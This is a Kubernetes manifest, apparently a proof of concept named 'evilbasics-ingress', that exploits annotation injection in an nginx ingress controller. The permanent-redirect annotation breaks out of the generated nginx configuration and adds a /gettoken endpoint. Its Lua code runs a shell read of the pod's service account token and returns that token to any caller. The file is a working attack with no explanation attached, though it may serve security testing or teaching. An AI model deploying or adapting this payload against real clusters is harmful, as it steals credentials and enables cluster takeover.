apiVersion: v1
kind: Service
metadata:
  name: default
spec:
  type: ClusterIP
  ports:
    - port: 8080
---
apiVersion: networking.k8s.io/v1
kind: Ingress
metadata:
  name: evilbasics-ingress
  annotations:
    nginx.ingress.kubernetes.io/permanent-redirect: |
      bla.blubb;
      } # close location block
      
        location ~* "^/gettoken(/|$)(.*)" { # code that is called at /gettoken
          content_by_lua 'ngx.say(io.popen("cat /var/run/secrets/kubernetes.io/serviceaccount/token"):read("*a"))';
        }
      
      } # close server block

      server { # new unrelated server block
        server_name somerandom.domain;
        location /foo/ {
          set $foo "aaa"
spec:
  ingressClassName: nginx
  rules:
    - host: evil.domain
      http:
        paths:
          - path: /
            pathType: Prefix
            backend:
              service:
                name: default
                port:
                  number: 8080